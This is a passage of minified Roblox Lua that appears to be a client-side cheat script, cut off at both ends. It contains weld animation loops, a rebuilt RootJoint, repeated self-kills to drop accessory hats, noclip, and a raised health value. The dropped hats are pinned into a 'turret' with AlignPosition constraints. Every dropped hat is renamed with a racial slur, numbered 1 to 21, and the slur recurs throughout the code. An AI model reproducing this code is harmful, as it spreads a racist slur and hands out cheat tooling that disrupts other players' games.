bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(30)),0.6)if Debounces.on==false then break end;wait()end;GroundPound()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(-20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(-30)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)if Debounces.on==false then break end;wait()end;GroundPound2()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(30)),0.6)if Debounces.on==false then break end;wait()end;GroundPound()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(-20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(-30)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)if Debounces.on==false then break end;wait()end;GroundPound2()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(30)),0.6)if Debounces.on==false then break end;wait()end;GroundPound()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(-20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(-30)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)if Debounces.on==false then break end;wait()end;GroundPound2()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(30)),0.6)if Debounces.on==false then break end;wait()end;GroundPound()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(-20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(-30)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)if Debounces.on==false then break end;wait()end;GroundPound2()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(30)),0.6)if Debounces.on==false then break end;wait()end;GroundPound()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(-20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(-30)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)if Debounces.on==false then break end;wait()end;GroundPound2()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(30)),0.6)if Debounces.on==false then break end;wait()end;if Debounces.CanAttack==false then Debounces.CanAttack=true;Debounces.on=false;Debounces.NoIdl=false end end end end)r=game:GetService("Players").LocalPlayer.Character.HumanoidRootPart["RootJoint"]:Clone()game:GetService("Players").LocalPlayer.Character.HumanoidRootPart["RootJoint"]:Destroy()r.Parent=game:GetService("Players").LocalPlayer.Character.HumanoidRootPart;r.Part0=game:GetService("Players").LocalPlayer.Character.HumanoidRootPart;r.Part1=Instance.new("Part",game:GetService("Players").LocalPlayer.Character)r.Part1.Size=Vector3.new(2,2,1)r.Part1.Name="Tors"r.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character.Tors)local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character.Torso)local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character.Tors)dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;local rJ="Idle"local rK="Idle"local dQ=0;local dR=1;local by=0;local rL=false;x=Instance.new("Sound",char)x.SoundId="http://www.roblox.com/asset/?id=187922823"x.Looped=true;x.Volume=30;x.Pitch=1;local rM=false;game:GetService("RunService").RenderStepped:connect(function()if char.Humanoid.Jump==true then jump=true else jump=false end;char.Humanoid.FreeFalling:connect(function(f)if f then rL=true else rL=false end end)dQ=dQ+dR;if jumpn==true then rJ="Jumping"elseif rL==true then rJ="Freefalling"elseif(torso.Velocity*Vector3.new(1,0,1)).magnitude<2 then rJ="Idle"elseif(torso.Velocity*Vector3.new(1,0,1)).magnitude<20 then rJ="Walking"elseif(torso.Velocity*Vector3.new(1,0,1)).magnitude>20 then rJ="Running"end;if rJ~=rK then dQ=0;if Debounces.NoIdl==false then if rJ=="Idle"then for T=1,2 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),0.2)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),0.2)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(0),0),0.2)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-1.2,0)*CFrame.Angles(0,math.rad(0),0),0.2)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-3,0)*CFrame.Angles(0,0,math.rad(-10)),0.2)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-3,0)*CFrame.Angles(0,0,math.rad(10)),0.2)end elseif rJ=="Walking"then for T=1,2 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,0)*CFrame.Angles(math.rad(0),math.rad(-10),math.rad(0)),0.2)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,0)*CFrame.Angles(0,math.rad(1),math.rad(-10)),0.2)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,0)*CFrame.Angles(math.rad(-8),math.rad(0),math.rad(0)),0.2)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-1.2,0)*CFrame.Angles(math.rad(-4),0,math.rad(0)),0.2)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1,-3,-.05)*CFrame.Angles(math.rad(-18),0,0),.4)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1,-3,-.05)*CFrame.Angles(math.rad(-18),0,0),.4)end elseif rJ=="Running"then for T=1,2 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,0.9,.5)*CFrame.Angles(math.rad(-0),math.rad(-40),math.rad(0)),0.2)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,1.2,0-1*math.cos(dQ/4)/2)*CFrame.Angles(math.rad(50-80*math.cos(dQ/8)/2),math.rad(0),math.rad(0-70*math.cos(dQ/8)/2)),0.2)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,0)*CFrame.Angles(math.rad(6+8*math.cos(dQ/4)/1.8),math.rad(0),math.rad(0)),0.2)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-1.2+0.2*math.cos(dQ/4)/2,0)*CFrame.Angles(math.rad(-14+4*math.cos(dQ/4)/2),0,math.rad(0)),0.2)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1,-3-0.44*math.cos(dQ/8)/2.4,-.15+math.sin(dQ/8)/1.5)*CFrame.Angles(math.rad(-20)+-math.sin(dQ/8)/1.7,0,0),.4)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1,-3+0.44*math.cos(dQ/8)/2.4,-.15+-math.sin(dQ/8)/1.5)*CFrame.Angles(math.rad(-20)+math.sin(dQ/8)/1.7,0,0),.4)end;wait()end else end end;rK=rJ;if Debounces.NoIdl==false then if rJ=="Idle"then if q6=="Normal"then dR=0.5;bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,0)*CFrame.Angles(math.rad(88+2*math.cos(dQ/14)),math.rad(50),math.rad(0)),0.2)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9+0.1*math.cos(dQ/14),0)*CFrame.Angles(math.rad(50),math.rad(-30),math.rad(-40-2*math.cos(dQ/14))),0.2)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14+1*math.cos(dQ/14)),math.rad(40),0),0.2)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-1.2,0)*CFrame.Angles(0,math.rad(-40),0),0.2)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.15,-3,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-10)),0.2)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.15,-3,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(10)),0.2)elseif q6=="Sitting"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,0)*CFrame.Angles(math.rad(100-1*math.cos(dQ/14)),math.rad(0),math.rad(20)),0.2)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2,.9,-1)*CFrame.Angles(math.rad(78+1*math.cos(dQ/14)),math.rad(0),math.rad(50)),0.2)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.3)*CFrame.Angles(math.rad(-14+1*math.cos(dQ/14)),math.rad(0),math.rad(0)),0.2)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-3,0)*CFrame.Angles(math.rad(-10+1*math.cos(dQ/14)),0,math.rad(0)),0.2)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1,-1,-2)*CFrame.Angles(math.rad(-10-1*math.cos(dQ/14)),0,0),0.2)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1,-3,.6)*CFrame.Angles(math.rad(-50-1*math.cos(dQ/14)),0,0),0.2)end elseif rJ=="Walking"then if q6=="Normal"then dR=1;bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9+.1*math.cos(dQ/7),-math.sin(dQ/14)/2)*CFrame.Angles(math.sin(dQ/14)/-4,math.rad(1)+-math.sin(dQ/14)/2,math.rad(30)),0.1)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9+.1*math.cos(dQ/7),-math.sin(dQ/14)/2)*CFrame.Angles(math.sin(dQ/14)/4,math.rad(1)+-math.sin(dQ/14)/2,math.rad(-30)),0.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,0)*CFrame.Angles(math.rad(-8+2*math.cos(dQ/7)),math.rad(0),math.rad(0)),0.2)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-1.2+0.1*math.cos(dQ/7),0)*CFrame.Angles(math.rad(-4+2*math.cos(dQ/7)),0,math.rad(0)),0.2)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1,-3-0.3*math.cos(dQ/14)/2,-.05+math.sin(dQ/14)/2)*CFrame.Angles(math.rad(-18)+-math.sin(dQ/14)/2.3,0,0),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1,-3+0.3*math.cos(dQ/14)/2,-.05+-math.sin(dQ/14)/2)*CFrame.Angles(math.rad(-18)+math.sin(dQ/14)/2.3,0,0),.1)end elseif rJ=="Running"then dR=1;bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,0.9,.5)*CFrame.Angles(math.rad(-10-20*math.cos(dQ/4)/2),math.rad(-40+10*math.cos(dQ/4)/2),math.rad(50-10*math.cos(dQ/4)/2)),0.2)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,0.9,.5)*CFrame.Angles(math.rad(10+20*math.cos(dQ/4)/2),math.rad(40-10*math.cos(dQ/4)/2),math.rad(-50+10*math.cos(dQ/4)/2)),0.2)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,0)*CFrame.Angles(math.rad(6+6*math.cos(dQ/4)/1.8),math.rad(0),math.rad(0)),0.2)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-1.2+0.2*math.cos(dQ/4)/2,0)*CFrame.Angles(math.rad(-14+10*math.cos(dQ/4)/2),0,math.rad(0)),0.2)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1,-3-0.44*math.cos(dQ/8)/2.4,-.15+math.sin(dQ/8)/1.5)*CFrame.Angles(math.rad(-20)+-math.sin(dQ/8)/1.7,0,0),.4)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1,-3+0.44*math.cos(dQ/8)/2.4,-.15+-math.sin(dQ/8)/1.5)*CFrame.Angles(math.rad(-20)+math.sin(dQ/8)/1.7,0,0),.4)end end;if rJ=="Walking"then if rM==false then x:Play()rM=true end;x.Pitch=0.9 elseif rJ=="Idle"then x:Stop()rM=false elseif rJ=="Running"then x.Pitch=1.2;if rM==false then x:Play()rM=true end end end)end)end;function Clickey14()pcall(function()local function rN()wait(0.25)for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="Space Cop"or v.Name=="Pal Hair"or v.Name=="LongHairHeadBand Black"or v.Name=="Pink Hair"or v.Name=="Kate Hair"or v.Name=="SpaceHelmetB"or v.Name=="Antennae"then v.Handle.Mesh:Remove()v.Parent=workspace end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="Cyber Peacock Tail 2.0"or v.Name=="RightMk73LP"or v.Name=="Bang w bun"then v.Handle.SpecialMesh:Remove()v.Parent=workspace end end;wait(1)game:GetService("Players").LocalPlayer.Character.Humanoid.Health=0;wait(game:GetService("Players").RespawnTime)wait(0.5)end;for T=1,5 do rN()end;wait(10)game:GetService("Workspace").SpaceHelmetB.Name="Nigga1"game:GetService("Workspace")["Cyber Peacock Tail 2.0"].Name="Nigga2"game:GetService("Workspace")["LongHairHeadBand Black"].Name="Nigga3"game:GetService("Workspace")["LongHairHeadBand Black"].Name="Nigga4"game:GetService("Workspace")["Pal Hair"].Name="Nigga5"game:GetService("Workspace")["Pink Hair"].Name="Nigga6"game:GetService("Workspace")["Kate Hair"].Name="Nigga7"game:GetService("Workspace")["Pal Hair"].Name="Nigga8"game:GetService("Workspace")["Pink Hair"].Name="Nigga9"game:GetService("Workspace")["Kate Hair"].Name="Nigga10"game:GetService("Workspace")["Pal Hair"].Name="Nigga11"game:GetService("Workspace")["Pink Hair"].Name="Nigga12"game:GetService("Workspace")["Kate Hair"].Name="Nigga13"game:GetService("Workspace")["Space Cop"].Name="Nigga14"game:GetService("Workspace").SpaceHelmetB.Name="Nigga15"game:GetService("Workspace")["Space Cop"].Name="Nigga16"game:GetService("Workspace").Antennae.Name="Nigga17"game:GetService("Workspace").RightMk73LP.Name="Nigga18"game:GetService("Workspace").RightMk73LP.Name="Nigga19"game:GetService("Workspace")["Bang w bun"].Name="Nigga20"game:GetService("Workspace")["Pal Hair"].Name="Nigga21"game:GetService("Workspace").Nigga1.Handle.CanCollide=false;game:GetService("Workspace").Nigga2.Handle.CanCollide=false;game:GetService("Workspace").Nigga3.Handle.CanCollide=false;game:GetService("Workspace").Nigga4.Handle.CanCollide=false;game:GetService("Workspace").Nigga5.Handle.CanCollide=false;game:GetService("Workspace").Nigga6.Handle.CanCollide=false;game:GetService("Workspace").Nigga7.Handle.CanCollide=false;game:GetService("Workspace").Nigga8.Handle.CanCollide=false;game:GetService("Workspace").Nigga9.Handle.CanCollide=false;game:GetService("Workspace").Nigga10.Handle.CanCollide=false;game:GetService("Workspace").Nigga11.Handle.CanCollide=false;game:GetService("Workspace").Nigga12.Handle.CanCollide=false;game:GetService("Workspace").Nigga13.Handle.CanCollide=false;game:GetService("Workspace").Nigga14.Handle.CanCollide=false;game:GetService("Workspace").Nigga15.Handle.CanCollide=false;game:GetService("Workspace").Nigga16.Handle.CanCollide=false;game:GetService("Workspace").Nigga17.Handle.CanCollide=false;game:GetService("Workspace").Nigga18.Handle.CanCollide=false;game:GetService("Workspace").Nigga19.Handle.CanCollide=false;game:GetService("Workspace").Nigga20.Handle.CanCollide=false;game:GetService("Workspace").Nigga21.Handle.CanCollide=false;local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local R={sphere1=game:GetService("Workspace"):WaitForChild("Nigga1"),base=game:GetService("Workspace"):WaitForChild("Nigga2"),shaft1=game:GetService("Workspace"):WaitForChild("Nigga5"),chair1=game:GetService("Workspace"):WaitForChild("Nigga3"),chair2=game:GetService("Workspace"):WaitForChild("Nigga4"),shaft2=game:GetService("Workspace"):WaitForChild("Nigga6"),shaft3=game:GetService("Workspace"):WaitForChild("Nigga7"),shaft4=game:GetService("Workspace"):WaitForChild("Nigga8"),shaft5=game:GetService("Workspace"):WaitForChild("Nigga9"),shaft6=game:GetService("Workspace"):WaitForChild("Nigga10"),shaft7=game:GetService("Workspace"):WaitForChild("Nigga11"),shaft8=game:GetService("Workspace"):WaitForChild("Nigga12"),shaft9=game:GetService("Workspace"):WaitForChild("Nigga13"),sphere2=game:GetService("Workspace"):WaitForChild("Nigga14"),sphere3=game:GetService("Workspace"):WaitForChild("Nigga15"),sphere4=game:GetService("Workspace"):WaitForChild("Nigga16"),bullethole=game:GetService("Workspace"):WaitForChild("Nigga17"),handle=game:GetService("Workspace"):WaitForChild("Nigga18"),handlegrab=game:GetService("Workspace"):WaitForChild("Nigga19"),boomer=game:GetService("Workspace"):WaitForChild("Nigga20"),bullet=game:GetService("Workspace"):WaitForChild("Nigga21")}local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=200;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=200 end;noclip=true;game["Run Service"].Stepped:connect(function()game:GetService("Players").LocalPlayer.Character.Torso.CanCollide=noclip;game:GetService("Players").LocalPlayer.Character.Head.CanCollide=noclip end)math.randomseed(tick())Colors={"Bright red","Really red","Bright yellow","Bright orange","New Yeller","Deep orange","Neon orange"}V3=Vector3.new;C3=Color3.new;BN=BrickColor.new;CN=CFrame.new;CA=CFrame.Angles;MR=math.rad;MRA=math.random;MP=math.pi;MH=math.huge;UD=UDim2.new;TI=table.insert;TR=table.remove;CR=coroutine.resume;CC=coroutine.create;it=Instance.new;Sound="http://www.roblox.com/asset/?id=81116747"Fire="http://www.roblox.com/asset/?id=10209821"cn=CN;rd=MR;ca=CA;rn=MRA;v3=V3;me=game:GetService("Players").LocalPlayer;Hold=false;Sitting=false;DecalBulletHole="http://www.roblox.com/asset/?id=64291961"pcall(function()me.Character.Humanoid.MaxHealth=500;wait()me.Character.Humanoid.Health=500 end)stick=function(rO,hit)local weld=Instance.new("Weld")weld.Part0=rO;weld.Part1=hit;local rP=rO.Position;local rQ=CN(rP)local eo=rO.CFrame:inverse()*rQ;local ep=hit.CFrame:inverse()*rQ;weld.C0=eo;weld.C1=ep;weld.Parent=rO end;function Part(rR,rS,rT,Tran,rU,rV,rW,rX,gf)local p=it("Part")p.formFactor="Custom"p.TopSurface=0;p.BottomSurface=0;p.Transparency=Tran;p.Reflectance=rU;p.Anchored=rS;p.CanCollide=rT;p.BrickColor=rV;p.Size=rW;p.Material=rX or"Plastic"p.Locked=true;if gf=="Wedge"then it("SpecialMesh",p).MeshType="Wedge"elseif gf=="Sphere"then it("SpecialMesh",p).MeshType="Sphere"elseif gf=="Cylinder"then it("CylinderMesh",p)elseif gf=="Block"then it("BlockMesh",p)end;p.Parent=rR;p:BreakJoints()return p end;RocketExplode=it("Sound",me.Character.Torso)RocketExplode.SoundId=Sound;RocketExplode.Volume=1;RocketExplode.Pitch=1;Fiyah=it("Sound",me.Character.Torso)Fiyah.SoundId=Fire;Fiyah.Volume=1;Fiyah.Pitch=1;cam=workspace.CurrentCamera;for T,v in pairs(cam:children())do v:Remove()end;Crown="http://www.roblox.com/asset/?id=20329976"Spike="http://www.roblox.com/asset/?id=1033714"ray=function(eS,eT,rY)local rZ=c;if not rY then rZ=nil end;return workspace:FindPartOnRay(Ray.new(eS,eT.unit*999),rZ)end;function Blast(Color,r_)local gy=Part(mod,true,false,0,0.15,BN(Colors[math.random(1,#Colors)]),V3(1,1,1),"Plastic")gy.Name="Blast"local s0=it("SpecialMesh",gy)s0.MeshId=Crown;s0.Scale=v3(5,4,5)gy.CFrame=r_;q(function()for T=-0.2,1,0.12 do gy.Transparency=T+0.1;s0.Scale=V3(1+5*1*T,2.4*1+1*T,1+5*1*T)wait()end;game:GetService("Debris"):AddItem(gy)end)end;pcall(function()me.Character["Turret"]:Remove()end)mod=it("Model",me.Character)mod.Name="Turret"base=Part(mod,true,true,0,0,BN("Medium grey"),V3(4,2,4),"Plastic","Block")p1=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,2,1),"Plastic","Block")seat=Part(mod,true,true,0,0,BN("Medium grey"),V3(2,0.5,2.5),"Plastic","Block")seatb=Part(mod,true,true,0,0,BN("Medium grey"),V3(2,3,.5),"Plastic","Block")seatattachment=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,2,1),"Plastic","Block")seatattachmentx=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,2,1),"Plastic","Block")seatatball1=Part(mod,true,true,0,0,BN("Medium grey"),V3(2,2,2),"Plastic","Sphere")seatattachment2=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,2,1),"Plastic","Block")seatattachment2x=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,2,1),"Plastic","Block")seatatball2=Part(mod,true,true,0,0,BN("Medium grey"),V3(2,2,2),"Plastic","Sphere")seatattachment3=Part(mod,true,true,0,0,BN("Medium 